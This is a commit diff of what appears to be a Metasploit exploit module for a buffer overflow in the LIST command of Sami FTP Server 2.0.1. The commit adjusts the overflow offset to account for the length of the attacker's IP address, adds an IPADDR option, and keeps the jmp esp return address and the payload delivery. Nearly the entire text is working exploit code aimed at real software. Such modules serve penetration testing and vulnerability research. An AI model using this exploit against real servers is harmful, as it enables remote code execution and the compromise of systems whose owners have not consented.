Uses IP address length in offset calculation
parent
3d92d6e977
commit
fb90a1b497
|
@ -17,7 +17,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
'Name' => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow',
|
||||
'Description' => %q{
|
||||
A buffer overflow is triggered when a long LIST
|
||||
command is sent to the server and the user views the Log tab.
|
||||
command is sent to the server while the user is viewing the Logs tab.
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Author' =>
|
||||
|
@ -48,18 +48,24 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
'Windows Universal',
|
||||
{
|
||||
'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll
|
||||
'Offset' => 219,
|
||||
'Offset' => 225,
|
||||
},
|
||||
],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Feb 27 2013'))
|
||||
register_options(
|
||||
[
|
||||
OptString.new('IPADDR', [true, 'Attacker\'s IP address'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect_login
|
||||
sleep 1
|
||||
|
||||
buf = rand_text(target['Offset'], payload_badchars)
|
||||
ip_length = datastore['IPADDR'].length - 3
|
||||
buf = rand_text_alphanumeric(target['Offset'] - ip_length)
|
||||
buf << [ target['Ret'] ].pack('V')
|
||||
buf << payload.encoded
|
||||
|
||||
|
|
Loading…
Reference in New Issue